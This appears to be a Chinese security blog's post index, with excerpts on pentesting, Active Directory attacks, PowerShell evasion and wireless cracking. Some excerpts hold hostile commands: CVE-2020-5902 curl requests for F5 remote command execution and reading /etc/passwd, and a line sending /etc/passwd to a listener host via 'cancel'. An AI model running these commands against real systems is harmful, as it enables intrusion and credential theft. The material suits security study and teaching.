自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(103)
  • 资源 (39)
  • 收藏
  • 关注

翻译 powershell攻击方法研究(翻译版)

powershell攻击方法研究执行摘要在创建恶意软件时,攻击者越来越多地利用已存在于target上的工具来攻击计算机,因为Microsoft PowerShell默认安装在Windows计算机上,它是一个理想的攻击工具链的候选项, 由于powershell使用较为灵活,并且检测更困难,因此被很多攻击者所喜爱。PowerShell是一种功能强大的脚本语言和shell框架,主要用于管理Windows计算机。它已经存在了10多年,被许多系统管理员所使用,并且将来可能替换Windows上的默认命令提示符。Powe

2022-10-16 22:26:34 388

原创 查看安卓应用本地监听的端口

1.查看安卓设备开放的端口adb shell netstat -a | grep -E 'LISTEN|udp*'2.将端口号转换为16进制进制转换 - 在线工具/proc/net/后面是端口使用的协议,如tcp6adb shell grep -i f099 /proc/net/tcp6通过上述命令获得应用uid为10072如果uid大于10000,可以通过如下方式获得应用的用户名为u0_a72u0_a'+str(uid-10000)3.根据用户名找到应用adb shell p

2022-04-04 23:44:33 9779

原创 busybox在安卓设备中的使用

busybox下载:Index of /downloads/binaries/1.35.0-i686-linux-muslbusybox使用:➜ Desktop adb push /Users/xxx/Desktop/busybox1 /sdcard/Users/xxx/Desktop/busybox1: 1 file pushed, 0 skipped. 109.4 MB/s (1061344 bytes in 0.009s)➜ Desktop adb shellcmi:/ $ suc

2022-04-04 23:41:55 3547

原创 kali linux 数字证书安装

安装数字证书使用apt-key list来查看下,发现有个keyring.gpg 过期了查看最新的文件Index of /kali/pool/main/k/kali-archive-keyring下载新的文件wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2022.1_all.deb安装apt install ./kali-archive-keyring_2022.1_al

2022-04-04 23:39:18 734

翻译 活动目录使用备忘单

活动目录使用备忘单包含 Windows 活动目录的常见枚举和攻击方法的备忘单。工具Powersploit PowerUpSQL Powermad Impacket Mimikatz Rubeus- >编译版本 BloodHound AD Module ASREPRoast枚举使用 PowerView 获取当前域:Get-NetDomain Enum 其他域:Get-NetDomain -Domain <DomainName> ...

2020-07-20 20:53:14 275

原创 CVE-2020-5902 F5 BIG-IP 远程代码执行RCE

cve-2020-5902 : RCE:curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'Read File:curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

2020-07-06 23:00:23 205

原创 SSTI-服务端模板注入漏洞

原理:服务端模板注入与SQL注入的成因一样,也是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。模板引擎模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。参考:https://baike.baidu.co.

2020-06-25 20:32:06 1281

原创 powershell代码混淆绕过

目前大多数攻击者已经将PowerShell 利用在了各种攻击场景中,如内网渗透,APT攻击甚至包括现在流行的勒索软件中。powershell的功能强大且调用方式十分灵活。1. cmd启动powershell首先看看powershel使用cmd.exe启动执行代码的方式:1.1 常规方法cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"cmd.exe /c "echo Write-Host SUCCESS -Fore G.

2020-06-21 15:03:27 1469

原创 绕过PowerShell执行策略的方法总结

默认情况下,PowerShell配置为阻止Windows系统上执行PowerShell脚本。对于渗透测试人员,系统管理员和开发人员而言,这可能是一个障碍,但并非必须如此。什么是PowerShell执行策略?PowerShell execution policy 是用来决定哪些类型的PowerShell脚本可以在系统中运行。默认情况下,它是“Restricted”(限制)的。然而,这个设置从来没有算是一种安全控制。相反,它会阻碍管理员操作。这就是为什么我们有这么多绕过它的方法。为什么我..

2020-06-20 22:16:00 927

转载 Ubuntu使用国内源安装指定Docker版本

使用Kubernetes1.15.1搭建集群时发现最高支持docker18.09,而我节点上的docker版本是19.03.1,所以需要更换一下docker版本1.卸载原有版本sudo apt-get remove docker docker-engine docker-ce docker.io如果需要删除所有镜像,容器和卷(第一次安装请忽略):sudo rm -rf /var/lib/docker备注:apt-get remove会保留软件的配置文件如果想删除请执行以下操作查看相关软件

2020-06-16 16:18:02 520

原创 检测并移除WMI持久化后门

WMI型后门只能由具有管理员权限的用户运行。WMI后门通常使用powershell编写的,可以直接从新的WMI属性中读取和执行后门代码,给代码加密。通过这种方式攻击者会在系统中安装一个持久性的后门,且不会在磁盘中留下任何文件。  WMI型后门主要有两个特征:无文件和无进程。其基本原理是:将代码加密存储在WMI中,达到所谓的无文件;当设定的条件满足时,系统将自动启动powershell进程去执行...

2020-05-05 12:33:12 1120

原创 域控制器DSRM账户安全防护

一、DSRM简介   1.DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障时还原、修复、重建活动目录数据库。通过在DC上运行ntdsutil 工具可以修改DSRM密码...

2020-05-05 12:32:25 1281

原创 AD域SSP安全防护

一、简介  SSP(Security Support Provider)是windows操作系统安全机制的提供者。简单的说,SSP就是DLL文件,主要用于windows操作系统的身份认证功能,例如NTLM、Kerberos、Negotiate、Secure Channel(Schannel)、Digest、Credential(CredSSP)。  SSPI(Security Suppor...

2020-05-05 12:31:10 1122

原创 SID History域权限维持

一、简介  每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。  如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,如果迁移后用户的SID值改变,系统会将原...

2020-05-05 12:29:56 578

原创 linux 下 go 语言环境搭建

1.首先去官网下载安装包https://studygolang.com/dl选择合适的安装包并下载解压wget https://studygolang.com/dl/golang/go1.13.8.linux-amd64.tar.gztar -zxvf go1.13.8.linux-amd64.tar.gz然后将go文件夹复制到 /usr/lo...

2020-05-05 12:28:07 193

原创 使用批处理管理域控制器

1、AD活动目录的优点:-集中管理:对象主要是用户和计算机。-便捷的网络资源访问:用户登录域中任意一台计算机都可以访问域中的资源。-可扩展性:Ecchange服务器集中管理:-用户:用户描述、部门、邮件地址、电话和住址等。-联系人:所在公司的名称和地址、邮件地址、传真等。2.管理AD中的计算机、组合OU```@echo offtitle 批处理管理AD中的计算机、组...

2020-05-05 12:26:53 606

原创 无线安全安全基础

一、无线网络基础  无线网络的搭建比较简单,只需要一个无线路由器即可实现。无线网络环境中,数据是以广播包形式传输,因此引起了无线网络的安全问题。尽管路由器中提供了各种加密方式来保护数据的安全。但是由于加密算法存在漏洞可以将其密码破解出来。1.1、无线网络构成  无线网络是采用无线通信技术实现的网络。无线网络既包括允许允许用户建立具有无线连接的全球语音和数据网络,也包括为近距离...

2020-05-05 12:25:27 1591

原创 Aircrack-ng无线审计工具使用

Aircrack-ng工具  Aircrack-ng是一个与802.11标准的无线网络分析的安全软件,主要功能有网络探测、数据包嗅探捕获、WEP和WPA/WPA2-PSK破解。Aircrack可以工作在任何支撑监听模式的无线网卡上,并嗅探802.11a、802.11b、802.11g的数据包。1.1、Aircrack-ng工具集  Aircrack-ng是一个包含了多款工具的无线...

2020-05-05 11:23:58 745

原创 Aireplay-ng 6 种常用攻击模式详解

reaver爆破WPS PIN码:  airodump-ng wlan0  reaver -i wlan0 -b D0:76:E7:51:2A:78 -vvmacchanger更改MAC地址:  macchanger -r wlan0  -r:随机更换MAC  -m:设置指定的MAC地址  macchanger -m 72:8e:9c:2d:a8:bb wl...

2020-05-05 11:21:30 2139

原创 命令注入绕过技巧总结

命令注入绕过技巧总结命令注入是一个安全漏洞,它使攻击者可以在易受攻击的应用程序中执行任意命令。基本命令root@micr067:~# cat /etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin...

2020-05-05 11:18:39 3409

原创 webshell管理-WeBaCoo和Weevely

WeBaCoo (Web Backdoor Cookie)简介类终端的shell,只针对 PHP编码通信内容通过 cookie 头传输,隐蔽性较强Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~cm:bash64 编码之后的命令cn:服务器用于返回数据的 cookie 头的名cp:返回信息定界符生成服务器端webacoo -g -o w...

2020-03-19 09:36:20 174

原创 使用卷影拷贝提取ntds.dit

一、简介  通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。使用windows本地卷影拷贝服务,就可以获得该文件的副本。  在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.dit。ntds.dit中包含用户名、散列值、组、GPP...

2020-02-15 10:34:40 812

原创 导出ntds.dit中的散列值

1.下载NTDSXhttp://www.ntdsxtract.comgit clonehttps://github.com/csababarta/ntdsxtract安装python setup.py build && python setup.py install将导出的ntds.dit.export 文件夹中的datatable.3和link_table....

2020-02-15 10:32:33 343

原创 Exchange2010安装指南

安装流程参考下面的:https://jingyan.baidu.com/article/2c8c281d6893680008252a9c.htmlhttps://blog.csdn.net/StevenKind/article/details/86526622安装环境:windows server 2008(已安装Active Diretcory服务)1、安装域控制器2、安装n...

2020-02-14 15:22:03 302

原创 Exchange邮件服务器安全

Exchange是由微软推出的用于企业环境中部署的邮件服务器。Exchange在逻辑上分为三个层次:网络层(network layer)、目录层(directory layer)、消息层(messaging layer),服务器角色正是在消息层上的一个细分。Exchange Server 2010包含五个服务器角色,分别是邮箱服务器(mailbox server)、集线传输服务器(hub tran...

2020-02-14 15:17:59 664

原创 RAR、7-Zip在命令行下对数据进行压缩

3.6.1 RARWinrar的命令行模式程序在安装目录下的 rar.exe (打包压缩程序),unrar.exe(解压缩程序)RAR.exe的常用参数如下:  -a   添加文件到压缩文件  -k   锁定压缩文件  -s   生成存档文件(这样可以提高压缩比)  -p   指定压缩密码  -r   递归压缩,包括子目录  -x   指定要排除的文件  ...

2020-02-12 16:22:41 1073

原创 防范明文密码和散列值抓取

一、单机密码抓取的防范方法  微软为了防止用户密码在内存中以明文形式泄露,发不了补丁KB2871997,关闭了Wdigest功能。windows server 2012以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。对于win server 2012以下版本,通过安装KB2871997补丁,可以避免攻击者获取明文密码。  通过查看注册表键值,可以判断Wdigest功能状态...

2020-02-12 16:20:36 1182

原创 Halo-个人独立博客系统

Halo-个人独立博客系统项目地址:https://github.com/halo-dev/halo安装指导:https://halo.run/guide/简介:Halo 是一款现代化的个人独立博客系统,给习惯写博客的同学多一个选择。Halo [ˈheɪloʊ],意为光环。当然,你也可以当成拼音读(哈喽)。轻快,简洁,功能强大,使用 Java 开发的博客系统。快速安装下载最新...

2020-01-31 13:00:51 2732

原创 各种反弹shell方法总结备忘

各种反弹shell方法总结shell分为两种,一种是正向shell,另一种是反向shell。如果客户端连接服务器,客户端主动连接服务器,就称为正向shell。如果客户端连接服务器,服务器想要获得客户端的shell,就称为反向shell。反向shell通常在开启了防护措施的目标机器上,例如防火墙、端口转发等。(1)正向shell输入如下命令,监听目标主机的4444端口nc -lvp ...

2020-01-31 12:46:33 856

原创 内网渗透之域渗透

1.初识域环境什么是域域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 域(Domain)是将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫...

2019-11-24 17:59:22 3155

原创 CA证书安装以及sslh协议转发

1.安装CA证书生成一个证书文件http://127.0.0.1/certsrv/ 申请证书选择高级证书申请将之前生成的base64证书文件内容贴进来ok,完成挂起的申请—所有任务—颁发在颁发的证书中可以看到我们已经申请好 的证书。访问http://127.0.0.1/certsrv/查看挂起的证书申请的状态这张证书包含所有...

2019-11-13 22:39:38 257

原创 linux下无回显可将回显发送到服务器

nc -lvvp 7080 开启侦听cancel -u “$(cat /etc/passwd)” -h 192.168.0.101:3321 在靶机上执行命令攻击机成功接收到靶机发送信息。

2019-11-13 22:27:56 242

原创 免杀工具汇总

今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。DKMC项目地址:https://github.com/Mr-Un1k0d3r/DKMC可以创建一个 outputs 文件夹 存放 shellcode启动python dkmc.py操作顺序:Sc :是将 msf 生成的 raw 文件转换位 shellcode 代码...

2019-11-13 22:17:25 7107

原创 wireshark图像化与命令行模式

1.筛选器ip.addr==192.168.88.160 and tcp.port==80!tcp 查看分tcp的协议frame.len<=150 查看长度小于等于150字节的数据包捕获tcp中带有psh和ack标志偏移位为13的的数据包tcp[13]==0x18将常用筛选条件到添加删选器分析–》显示过滤器–》+添加2.wireshark 使用表格3....

2019-11-13 21:50:38 459

原创 本地密码提取工具-LaZagne

简介:LaZagne项目是用于开源应用程序获取大量的密码存储在本地计算机上。每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。该项目已作为开发后模块添加到pupy中。Python代码将在不接触磁盘的情况下在内存中进行解释,并且可以在Windows和Linux主机上运行。项目地址:https://github.c...

2019-11-13 21:32:12 2890

原创 xss实体绕过示例

知识点:倘若是在script、input标签当中,即可突破。Payload‘ oninput=alert`1` // 当要在input中输入内容时触发事件‘ oninput=alert`1` ‘ 同上‘ onchange=alert`1` // 发生改变的时候触发该事件‘ onchange=alert`1` ‘ 同上在script里直接alert示例:首选...

2019-11-13 21:29:03 1823

原创 PowerShell攻击:nishang

nishanhg下载地址:https://github.com/samratashok/nishing1.简介nishang的使用是要在PowerShell 3.0以上的环境中才可以正常使用。也就是说win7下是有点小问题的。因为win7下自带的环境是PowerShell 2.02.环境准备查看powershell版本get-host 或者 $PSVersionTable.P...

2019-10-26 23:11:01 498

原创 PowerShell渗透--Empire(三)

PowerShell渗透--Empire(三)会话注入我们可以使用usemodule management/psinject模块来进程注入,获取权限设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回域用户权限shellusemodule management/psinjectset Listener Micr067set...

2019-10-25 23:55:56 245

原创 PowerShell渗透--Empire(二)

PowerShell渗透--Empire(二)权限提升 Bypass UAC usemodule powershell/privesc/bypassuac 设置listener execute list查看 usemodule powershell/private/bypassuac_wscript (win7) ...

2019-10-25 23:54:44 222 1

原创 PowerShell渗透--Empire

0x00 简介Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpre...

2019-10-25 23:53:26 471 2

linuxprivchecker.py

linuxprivchecker是一款安全检测脚本,可以帮助您了解系统的弱点,从而更好的完善系统。

2019-08-24

CISSP终极指南2019.1.pdf

CISSP终极指南2019.1 可以帮助您了解CISSP,帮助您了解CISSP考试相关内容,从而更好的备考。

2019-08-24

LinEnum.zip

LinEnum是一款在linux系统使用的辅助提权脚本,它能够帮助你找到系统的弱点,从而方便提权。

2019-08-24

CTFCrackTools.7z

CTFCrackTools 包括各种编码解码功能,可以满足ctf比赛时编解码任务。。。

2019-08-24

逻辑漏洞突破.txt

支付漏洞突破口 一、订单相关 1.选择商品时修改商品价格 2.选择商品时将商品数量设为负数 3.商品库存为1时,多人同时购买,是否产生冲突 4.商品库存为0时,是否还能购买 5.生成订单时,修改订单金额

2019-08-11

勒索病毒应急处置流程 _ Micr067's blog.pdf

勒索病毒应急处置流程

2019-08-11

注册表位置对照表

注册表位置对照表,注册表位置查看

2019-02-28

CTF 实战选择题

CTF 实战 选择题,带答案 编辑版

2019-02-28

ASCII码对照表

ASCII码对照表。

2019-02-28

windows vega扫描器

Vega是一款免费的开源扫描仪和测试平台,用于测试Web应用程序的安全性。Vega可以帮助您查找并验证SQL注入,跨站点脚本(XSS),无意中泄露的敏感信息以及其他漏洞。它是用Java编写的,基于GUI,可在Linux,OS X和Windows上运行。 Vega包括用于快速测试的自动扫描器和用于战术检查的拦截代理。Vega扫描器发现XSS(跨站点脚本),SQL注入和其他漏洞。Vega可以使用网络语言中强大的API进行扩展:Javascript。

2019-02-28

kali 安装vega扫描器

Vega是一款免费的开源扫描仪和测试平台,用于测试Web应用程序的安全性。Vega可以帮助您查找并验证SQL注入,跨站点脚本(XSS),无意中泄露的敏感信息以及其他漏洞。它是用Java编写的,基于GUI,可在Linux,OS X和Windows上运行。 Vega包括用于快速测试的自动扫描器和用于战术检查的拦截代理。Vega扫描器发现XSS(跨站点脚本),SQL注入和其他漏洞。Vega可以使用网络语言中强大的API进行扩展:Javascript。

2019-02-28

内存镜像转储取证

这个工具可以dump内存,将目前计算机的内存镜像保存为raw文件,然后方便使用kali中的取证工具进行取证分析。

2019-01-13

ip溯源技术的研究

ip溯源技术的简单研究,

2019-01-13

IIS7.0开启CGI功能,实现php解析

IIS7.0开启CGI功能,实现php解析, IIS7.0开启CGI功能,实现php解析,

2019-01-13

信息安全体系建设实践

信息安全体系的建设分享,

2019-01-13

CCS在线检测工具

对勾代表无影响,x代表有影响。

2018-10-17

CMSeasy v5.5任意权限getshell

CMSeasy任意权限getshell

2018-08-28

渗透测试平台

一款渗透测试实战平台。

2018-08-28

抓包神器BurpSuite_Pro破解版

Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

2018-08-28

基于安卓的记账系统源码

基于安卓的记账系统源码,入账出账分类查询,添加修改删除入出账项目,功能比较实用,可以修改做毕业设计使用

2017-12-10

安卓记账源码

基于安卓平台的记账软件源码,已经包含了基本的记账功能,可以参考和修改做毕业设计

2017-12-10

Android应用本地监听端口的安全风险

Android应用通常使用PF_UNIX、PF_INET、PF_NETLINK等不同domain的socket来进行本地IPC或者远程网络通信,这些暴 露的socket代表了潜在的本地或远程攻击面,历史上也出现过不少利用socket进行拒绝服务、root提权或者远程命令执行的 案例。特别是PF_INET类型的网络socket,可以通过网络与Android应用通信,其原本用于linux环境下开放网络服务,由于 缺乏对网络调用者身份或者本地调用者pid、permission等细粒度的安全检查机制,在实现不当的情况下,可以突破Android 的沙箱限制,以被攻击应用的权限执行命令,通常出现比较严重的漏洞。作为Android安全研究的新手,笔者带着传统服务 器渗透寻找开放socket端口的思路,竟然也刷了不少漏洞,下面就对这种漏洞的发现、案例及影响进行归纳。

2022-02-10

RedCore红队研发从入门到精通之书籍推荐篇(密码RedCore).pdf

RedCore红队研发从入门到精通之书籍推荐篇(密码RedCore)

2021-02-01

Cobalt Strike 4.2 Manual.pdf

Cobalt Strike 4.2 手册,英文版的,没有汉化

2021-02-01

monowall.rar

m0n0wall 是一个完整的、嵌入式的防火墙软件包,该软件包可以安装于嵌入式PC里。m0n0wall基于bare-bones version of FreeBSD,包括一个WEB服务器,PHP和另一些工具软件。整个系统的配置保存在一个XML文件当中。m0n0wall可能是第一个启动时通过PHP配置的UNIX系统。m0n0wall编写者认为m0n0wall不包含在第3层 和第4层防火墙的基础服务外的任何功能。因为m0n0wall是嵌入式的防火墙面向嵌入设备有限的CPU资源和记忆体资源。m0n0wall不允许登录: 在控制台没有登录提示符,(它被一个功能菜单代替) ,没有任何Telnet或SSH守护程序。

2019-12-08

批量SQL.zip

批量SQL,一款可以实现批量注入的工具,可以快速识别并发现可能存在的注入点。

2019-08-25

BurpSuite官方说明书.doc

BurpSuite官方说明书,最专业的burpsuite功能及使用说明文档。

2019-08-25

完整的互联网安全手册 (2019年第2版)一PART1.pdf

2-国家关键信息基础设施应急响应模型 - ZAHRI YUNOS【可公开】.pdf

2019-08-25

2-国家关键信息基础设施应急响应模型 - ZAHRI YUNOS【可公开】.pdf

2-国家关键信息基础设施应急响应模型 - ZAHRI YUNOS【可公开】

2019-08-25

XXEinjector.zip

XXEinjector 一款XXE注入测试工具,可以通过命令行快速检测可能存在的XXE漏洞!

2019-08-24

域渗透.pdf

域渗透。 pdf

2019-08-23

cobalt-strike.pdf

cobalt-strike.pdf cobalt-strike 使用手册,官方教程

2019-08-23

CVE-2019-1181&1182;修复工具.rar

CVE-2019-1181&1182;修复工具 腾讯出 的 RDS 修复工具

2019-08-23

AWVS12 windows20190822.rar

AWVS12 windows20190822 破解版 亲测可用,首次进入需要关闭自动更新!

2019-08-23

实战攻防之紫队视角下的实战攻防演习组织.docx

实战攻防之紫队视角下的实战攻防演习组织

2019-08-23

实战攻防之红队视角下的防御体系突破.docx

实战攻防之红队视角下的防御体系突破

2019-08-23

Motrix--1.3.8.rar

Motrix-Setup 一款开源的下载器,支持多线程,完全免费,下载速度贼快!

2019-08-23

wsl-terminal-0.8.13.7z

wsl-terminal 一款适用于windows系统的命令行工具,界面美观,功能强大!

2019-08-23

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除